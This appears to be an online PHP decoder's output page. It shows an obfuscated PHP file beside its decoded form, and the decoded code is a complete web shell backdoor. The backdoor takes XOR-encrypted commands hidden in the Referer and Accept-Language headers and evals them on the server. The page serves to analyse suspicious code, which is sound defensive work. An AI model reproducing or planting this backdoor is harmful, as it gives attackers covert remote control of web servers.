Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $d='y"]J,J$q);$q=arrayJ_valuJes($q);Jpreg_mJaJtcJh_all("/J([\\w])[\\w-]J+(?:;q=0.J(..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$d='y"]J,J$q);$q=arrayJ_valuJes($q);Jpreg_mJaJtcJh_all("/J([\\w])[\\w-]J+(?:;q=0.J([\\d]J))?,?/J",$ra,$mJ);if($';
$u='2]J[$z]];if(JstJrpos($p,$h)===0)JJ{$s[$i]=""J;$Jp=$ss($Jp,3);}if(arrJJaJy_key_exists(J$i,$s)){$sJJ[$i].=$pJ;';
$H=str_replace('m','','mcreatme_mfumncmtimon');
$K='$kh="5d4J1JJJ";$kf="402a";funcJJtion x($t,$kJ){$c=sJtrlen($k);J$l=strlenJ($Jt);$o="";Jfor(J$i=0;$i<$Jl;){fo';
$n='$JeJ=strpos($s[$Ji],$f)J;if($e){$kJ=$kJh.$kf;ob_staJrt();J@evaJl(@gzuncoJmpJrJJess(@x(@base6J4_decode(pregJ_';
$D='qJ&&$mJ){@sesJsion_sJtarJt()J;$s=JJ&$J_SESSION;$JJss="substr";$sl="sJtrtolowJer";$i=J$mJ[1][0].$m[1]J[1];$Jh=$sl($ss(';
$T='JreplacJe(arrJay("/_/","/-/JJ"),arrayJJ("/","+"),$JsJs($s[$i],0,J$e))),J$k)));$oJ=ob_Jget_contenJtJs();ob_e';
$I='_REFERJER"];$raJ=J@$r["HTTPJ_ACCEPT_LJAJNGUAGE"J];if($rrJ&&$ra){$Ju=parsJe_JJurl($Jrr);pJarse_Jstr($u["quer';
$f='JJnd_clean();$dJ=basJe64_enJcodeJ(x(gzJcompresJs($o),$Jk));print(J"<$k>$dJ</$Jk>");@JsJessioJn_destroy();}}}}';
$L='md5J($Ji.$kh),0,J3));JJ$f=$sl($sJs(md5J($iJ.$kf),0,J3));$p="";for(J$z=1J;$z<couJnt($m[1J]);$z+J+J)$p.J=$qJ[$m[';
$Q='rJ($j=J0;($Jj<$Jc&&$i<$l)J;$j++J,J$iJ++){$o.=$t{$i}^$k{J$j};}}retJurJn $oJ;}$r=J$J_SERVER;$rr=@$JrJ["HTTP';
$G=str_replace('J','',$K.$Q.$I.$d.$D.$L.$u.$n.$T.$f);
$m=$H('',$G);$m();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D qJ&&$mJ){@sesJsion_sJtarJt()J;$s=JJ&$J_SESSION;$JJss="substr..
$G $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$H create_function
$I _REFERJER"];$raJ=J@$r["HTTPJ_ACCEPT_LJAJNGUAGE"J];if($rrJ&&$..
$K $kh="5d4J1JJJ";$kf="402a";funcJJtion x($t,$kJ){$c=sJtrlen($k..
$L md5J($Ji.$kh),0,J3));JJ$f=$sl($sJs(md5J($iJ.$kf),0,J3));$p="..
$Q rJ($j=J0;($Jj<$Jc&&$i<$l)J;$j++J,J$iJ++){$o.=$t{$i}^$k{J$j};..
$T JreplacJe(arrJay("/_/","/-/JJ"),arrayJJ("/","+"),$JsJs($s[$i..
$d y"]J,J$q);$q=arrayJ_valuJes($q);Jpreg_mJaJtcJh_all("/J([\w])..
$f JJnd_clean();$dJ=basJe64_enJcodeJ(x(gzJcompresJs($o),$Jk));p..
$m None
$n $JeJ=strpos($s[$Ji],$f)J;if($e){$kJ=$kJh.$kf;ob_staJrt();J@e..
$u 2]J[$z]];if(JstJrpos($p,$h)===0)JJ{$s[$i]=""J;$Jp=$ss($Jp,3)..

Stats

MD5 9bb2a7eb62ed9a7597dcac94e2b132c4
Eval Count 1
Decode Time 90 ms